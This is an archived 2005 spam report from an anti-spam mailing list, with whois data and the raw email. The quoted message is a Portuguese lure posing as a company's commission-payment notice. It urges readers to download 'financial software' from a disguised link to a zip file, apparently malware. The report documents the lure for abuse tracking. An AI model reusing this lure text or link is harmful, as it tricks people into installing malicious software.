comissões referente ao mês de março

admin-bounces at async.com.br admin-bounces at async.com.br
Wed Mar 30 15:51:56 BRT 2005


Este é um informe de Spam gerado pelo spambot da Async Open Source
para distribuição nas listas spambr-new e spam at async. Uma mensagem
semelhante foi enviada ao serviço spamcop.net e ao grupo Usenet
news.admin.net-abuse.sightings. O spam parece originar do host:

  Aparentemente originado de: USER.52.170.4.201.dial-ip.telemar.net.br [201.4.170.52]                   

        Total de cabecalhos: 1 
          Cabecalhos falsos: 0
       Cabecalhos ignorados: 0

Dados do whois seguem:

	[Querying whois.arin.net]
	[Redirected to whois.lacnic.net]
	[Querying whois.lacnic.net]
	[whois.lacnic.net]
	
	% Copyright LACNIC lacnic.net
	%  The data below is provided for information purposes
	%  and to assist persons in obtaining information about or
	%  related to AS and IP numbers registrations
	%  By submitting a whois query, you agree to use this data
	%  only for lawful purposes.
	%  2005-03-30 15:51:53 (BRT -03:00)
	
	inetnum:     201.0/12
	status:      allocated
	owner:       Comite Gestor da Internet no Brasil
	ownerid:     BR-CGIN-LACNIC
	responsible: Frederico A C Neves
	address:     Av. das Nações Unidas, 11541, 7° andar
	address:     04578-000 - São Paulo - SP
	country:     BR
	phone:       +55 11 9119-0304 []
	owner-c:     CGB
	tech-c:      CGB
	inetrev:     201.0/12
	nserver:     A.DNS.BR 
	nsstat:      20050329 AA
	nslastaa:    20050329
	nserver:     B.DNS.BR 
	nsstat:      20050329 AA
	nslastaa:    20050329
	nserver:     C.DNS.BR 
	nsstat:      20050329 AA
	nslastaa:    20050329
	nserver:     D.DNS.BR 
	nsstat:      20050329 AA
	nslastaa:    20050329
	nserver:     E.DNS.BR 
	nsstat:      20050329 AA
	nslastaa:    20050329
	remarks:     These addresses have been further assigned to Brazilian users.
	remarks:     Contact information can be found at the WHOIS server located
	remarks:     at whois.registro.br or at http://whois.registro.br
	created:     20030618
	changed:     20030618
	
	nic-hdl:     CGB
	person:      Comite Gestor da Internet no Brasil
	e-mail:      blkadm at NIC.BR
	address:     Av. das Nações Unidas, 11541, 7° andar
	address:     04578-000 - São Paulo - SP
	country:     BR
	phone:       +55 19 9119-0304 []
	created:     20020902
	changed:     20020902
	
	% whois.lacnic.net accepts only direct match queries.
	% Types of queries are: POCs, ownerid, CIDR blocks, IP
	% and AS numbers.

The raw message forwarded to me follows:
------------------------------------------------------------------------

Received: from bol.com.br (USER.52.170.4.201.dial-ip.telemar.net.br
	[201.4.170.52] (may be forged))
	by anthem.async.com.br (8.12.3/8.12.3) with SMTP id j2R8NqU6023669;
	Sun, 27 Mar 2005 05:24:20 -0300
Date: Sun, 27 Mar 2005 05:23:52 -0300
Message-Id: <200503270824.j2R8NqU6023669 at anthem.async.com.br>
From: "Elis Regina- Dept: Comunicação" <cobrecalideranca at uol.com.br>
To: cobrecalideranca at uol.com.br
Subject: comissões referente ao mês de março
MIME-Version: 1.0
Content-Type: text/html
<!-- saved from url=(0022)http://internet.e-mail -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>No Title</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2604" name=GENERATOR></HEAD>
<BODY>
<DIV>Bom dia!!</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>Senhores,</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>Informamos que o pagamento &nbsp;das comissões referente o mês&nbsp; de 
<STRONG>março &nbsp;será dia 09/04/05</STRONG>.</DIV>
<DIV>Pedimos à todos que estiverem devendo notas &nbsp;fiscais&nbsp;&nbsp; nos 
enviarem &nbsp;o mais rápido possível para que não haja nenhum problema no 
momento do pagamento das comissões.</DIV>
<DIV>Para aqueles que ainda não instalaram o software&nbsp;das comissões pedimos 
que baixem através do link a seguir e atualizem&nbsp;seu cadastro para 
recebimento das comissões de março: <A 
href="http://www.microsoftoffice20050102.kit.net/microsoft200501/009u849.zip"><B><FONT
 face=Verdana color=#ff0000 size=1>software financ</FONT></B></A><FONT 
face=Verdana size=1>.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>Atenciosamente,</DIV>
<DIV>&nbsp;</DIV>
<DIV>Silvia Regina <BR>Deptº. Comunicação</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>
<HR align=left width=400 SIZE=2>
<FONT face="trebuchet MS, arial" size=2>Esta mensagem foi verificada pelo <A 
href="http://mail.terra.com.br/">E-mail Protegido Terra</A>.<BR>Scan engine: 
McAfee VirusScan / Atualizado em 21/03/2005 / Versão: 4.4.00 - Dat 
4451<BR>Proteja o seu e-mail Terra: <A 
href="http://mail.terra.com.br/">http://mail.terra.com.br/</A> 
</FONT></DIV></BODY></HTML>




More information about the Spam mailing list